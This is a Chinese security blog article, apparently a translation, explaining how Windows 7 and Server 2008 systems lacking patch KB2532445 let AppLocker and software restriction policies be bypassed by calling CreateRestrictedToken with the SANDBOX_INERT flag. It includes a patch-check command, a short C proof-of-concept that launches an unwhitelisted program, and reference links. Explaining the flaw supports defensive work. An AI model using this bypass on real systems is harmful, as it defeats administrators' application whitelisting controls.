绕过AppLocker系列之CreateRestrictedToken的利用 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

绕过AppLocker系列之CreateRestrictedToken的利用

丝绸之路 系统安全 2017-07-31 10:20:36
235470
收藏

导语:大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。

大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。但是,我们还有一种通过利用架构设计的漏洞来绕过SPR或AppLocker。特别是在Windows 7和Windows 2008 Server环境中,可以滥用API函数(CreateRestrictedToken)来实现绕过。微软后来发布了一个补丁来解决这个问题。

从命令提示符可以轻易的识别出是否缺少这个补丁:

wmic.exe qfe list | findstr.exe   2532445

无标题.png

AppLocker修补程序丢失

因为没有输出任何内容,所以这表示KB2532445补丁并没有安装。直接尝试执行不受信任的二进制文件就会因为AppLocker的限制而运行失败。

12.png

有一个由Michael Bailey开发的PowerShell 脚本,它通过使用SANDBOX_INERT标志来利用API函数CreateRestrictedToken,以便可以允许执行二进制文件。由于该标志禁用了所有规则集合的检查,因此可以绕过AppLocker和软件限制策略。这个漏洞最初是由Didier Stevens发现的,并且在他的博客中进行了完整的记录。

13.png

AppLocker Bypass – CreateRestrictedToken

为什么会发生这样的情况呢?让我们来看看 MSDN 是如何定义CreateRestrictedToken这个 API函数的。关于CreateRestrictedToken 函数的SANDBOX_INERT标志,MSDN 有如下描述:

如果使用此值,系统将不会检查AppLocker规则或应用软件限制策略。对于AppLocker,此标志将禁用所有这四个规则集的检查:可执行文件,Windows Installer,脚本和DLL。

在安装过程中创建必须运行提取的DLL的安装程序时,请在SaferComputeTokenFromLevel函数中使用SAFER_TOKEN_MAKE_INERT标志。

我写了一个小的应用程序来进行测试:

HANDLE hToken;
HANDLE hNewToken;
PROCESS_INFORMATION sPI;
STARTUPINFO sSI;
 
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
    if (CreateRestrictedToken(hToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &hNewToken))
    {
        memset(&sSI, 0, sizeof(sSI));
        sSI.cb = sizeof(sSI);
        if (CreateProcessAsUser(hNewToken, L"c:testDialog42.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &sSI, &sPI))
        {
            puts("process created");
        }
}

这个程序会启动另外一个程序——Dialog42.exe,我已经使用白名单配置了SRP,但是Dialog42.exe并不在白名单列表中:

1500896956246621.png

但是,当我在我的应用程序中使用SANDBOX_INERT标志启动Dialog42.exe时,就可以正常运行。

参考

https://blog.didierstevens.com/2011/01/25/circumventing-srp-and-applocker-to-create-a-new-process-by-design/

https://support.microsoft.com/en-us/help/2532445/you-can-circumvent-applocker-rules-by-using-an-office-macro-on-a-compu

http://baileysoriginalirishtech.blogspot.co.uk/2015/06/applocker-schmapplocker.html

https://github.com/strictlymike/Invoke-SchmappLocker/blob/master/Invoke-SchmappLocker.ps1

  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2024 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务